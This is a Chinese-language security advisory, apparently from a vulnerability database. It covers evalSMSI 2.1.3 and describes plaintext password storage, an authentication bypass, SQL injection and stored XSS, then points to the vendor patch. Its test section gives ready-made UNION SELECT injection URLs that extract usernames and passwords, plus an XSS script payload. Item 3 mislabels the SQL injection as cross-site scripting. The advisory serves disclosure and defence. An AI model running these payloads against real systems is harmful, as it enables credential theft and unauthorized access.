安全研究

安全漏洞
evalSMSI多个远程安全漏洞

发布日期:2010-02-05
更新日期:2010-02-08

受影响系统:
evalSMSI evalSMSI 2.1.3
不受影响系统:
evalSMSI evalSMSI 2.2
描述:
BUGTRAQ  ID: 38116

evalSMSI是用PHP/MySQL开发的WEB应用,用于评估信息安全管理系统。

evalsmsi中存在多个输入验证和明文口令等安全漏洞,远程攻击者可以利用这些漏洞获得非授权访问或执行SQL注入、跨站脚本等攻击。

1 - 不安全口令存储

数据库中以明文存储了口令:

table : authentification
column: password

2 - 绕过认证

用户可通过ajax.php提交某些请求,这样就无需认证便获得了对应用的访问。

3 - SQL注入

可通过向ajax.php脚本提交恶意参数请求执行跨站脚本攻击。以下是有漏洞的代码段:

$id = $_GET['query'];
$action = $_GET['action'];

$base = evalsmsiConnect();
switch ($action) {
case 'sub_par':
$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'question':
$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'num_quest':
$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";
break;
default:
break;

4 - 跨站脚本

可向报表的标注框中注入JavaScript,执行存储式跨站脚本攻击。

<*来源:ekse
  
  链接:http://marc.info/?l=full-disclosure&m=126537085630095&q=p3
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22

</textarea><script>alert('XSS found by Corelan Team');</script>

建议:
厂商补丁:

evalSMSI
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://sourceforge.net/projects/evalsmsi/

浏览次数:2600
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障